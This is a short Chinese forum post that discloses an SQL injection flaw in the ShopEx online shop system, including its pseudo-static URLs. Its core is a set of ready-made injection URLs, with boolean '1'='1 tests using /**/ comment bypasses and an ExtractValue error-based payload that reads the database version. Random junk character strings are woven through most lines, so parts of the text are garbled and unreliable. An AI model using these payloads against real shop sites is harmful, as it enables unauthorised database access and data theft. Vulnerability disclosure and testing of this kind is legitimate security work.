注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…0 w9 | H. A# f4 ^
1 N6 B9 X7 u& _# K
好吧,我扯远了~~: B8 F, [7 U- w& L# G0 e1 R4 T
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~2 V; Z' R" s& C" `' H
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:% z+ w' ], |2 e6 [8 L6 q4 E& f3 g0 @% t
: W% }# v, d9 M/ Z8 b0 S
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
8 v! D C( s/ ] U4 Q# J1 v# [
0 {0 q1 c- n: v0 R, x- Hhttp://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html5 Z; _1 F8 _& Q+ h( V7 `- K' R
' }" s0 o5 ^: x( s6 n8 r1 vhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
/ ^. z- j5 X; i6 W" \; g
* v. ?4 d6 i8 j+ N O8 t! p2 ehttp://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
6 |- M& f0 Z/ V- q4 u) i5 O6 ~+ n$ `" _- ]- O
# l- G0 l0 N$ c' I( A0 p
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
- O3 o) ~! `1 ~6 K2 Y如何注入就不多说了,10多年的东西了…不会也会了…
5 R' v' J8 b h' }) W7 g
! H3 p$ U7 G, P, @" Q |